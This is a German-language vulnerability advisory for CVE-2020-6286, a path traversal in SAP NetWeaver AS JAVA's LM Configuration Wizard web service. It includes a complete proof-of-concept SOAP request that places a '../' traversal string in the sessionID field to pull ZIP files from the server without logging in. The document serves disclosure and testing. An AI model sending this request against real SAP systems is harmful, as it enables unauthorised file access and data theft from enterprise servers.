
[CVE-2020-6286] SAP NetWeaver AS JAVA (LM Configuration Wizard) Verzeichnis-Traversal
[CVE-2020-6286] SAP NetWeaver AS JAVA (LM Configuration Wizard) Verzeichnis-Traversal
SAP NetWeaver ist die integrierte Technologieplattform von SAP und die technische Grundlage aller SAP-Anwendungen seit SAP Business Suite. SAP NetWeaver ist eine serviceorientierte Anwendungs- und Integrationsplattform, die eine Entwicklungs- und Laufzeitumgebung für SAP-Anwendungen bereitstellt und auch für individuelle Entwicklung sowie die Integration mit anderen Anwendungen und Systemen genutzt werden kann. Die unzureichende Validierung des Eingabepfads eines bestimmten Parameters im Webservice von SAP NetWeaver AS JAVA (LM Configuration Wizard), Versionen 7.30, 7.31, 7.40, 7.50, ermöglicht einem nicht authentifizierten Angreifer, eine Methode auszunutzen, um ZIP-Dateien in ein bestimmtes Verzeichnis herunterzuladen, was zu einem Pfad-Traversal führt.
Für einen sicheren Proof of Concept können Sie die folgende Anfrage verwenden. Wenn die ZIP-Datei auf dem entfernten Host vorhanden ist, wird die Datei 111.zip heruntergeladen.
POST /CTCWebService/CTCWebServiceBean HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 340
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
<soapenv:Header />
<soapenv:Body>
<urn:queryProtocol>
<sessionID>/../../../../../../../../../../../../../../../../../..111</sessionID>
</urn:queryProtocol>
</soapenv:Body>
</soapenv:Envelope>